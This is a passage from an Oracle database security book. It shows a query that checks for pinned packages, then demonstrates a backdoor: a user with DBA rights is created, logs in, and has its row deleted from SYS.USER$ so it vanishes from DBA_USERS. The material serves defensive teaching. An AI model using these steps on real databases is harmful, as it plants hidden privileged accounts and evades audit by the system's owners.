Database Reference
In-Depth Information
SQL> SELECT SUBSTR(owner,1,10) Owner,
2 SUBSTR(type,1,12) Type,
3 SUBSTR(name,1,20) Name,
4 executions,
5 sharable_mem Mem_used,
6 SUBSTR(kept||' ',1,4) "Kept?"
7 FROM v$db_object_cache
8 WHERE type in ('TRIGGER','PROCEDURE','PACKAGE BODY','PACKAGE')
9 and owner in ('SYS','SYSTEM')
10 and executions != 0
11 and kept='YES'
12 ORDER BY name;
no rows selected
This is a really easy security check to make. In modern systems there is normally enough memory to not have to
pin packages, which is why none of the packages are pinned by default in 12.1. It is worth adding a check for pinned
packages as part of your state checking. You can see that was not difficult to defend against, so now on to the next
backdoor threat.
Deleted User Still in the SGA
The following code shows how to create a user account that is not shown in DBA_USERS:
SQL> sho user
USER is "SYS"
SQL> create user hacker identified by o;
User created.
SQL> grant dba to hacker;
Grant succeeded.
SQL> select * from dba_users where username='HACKER';
USERNAME
--------------------------------------------------------------------------------
USER_ID
----------
PASSWORD..
C:\Users\abfb378\Desktop\Apress\Chapters>sqlplus hacker/o@192.168.56.101/orcl
SQL> DELETE FROM SYS.USER$ WHERE NAME='HACKER';
1 row deleted.
SQL> SELECT * FROM DBA_USERS WHERE username='HACKER';
no rows selected
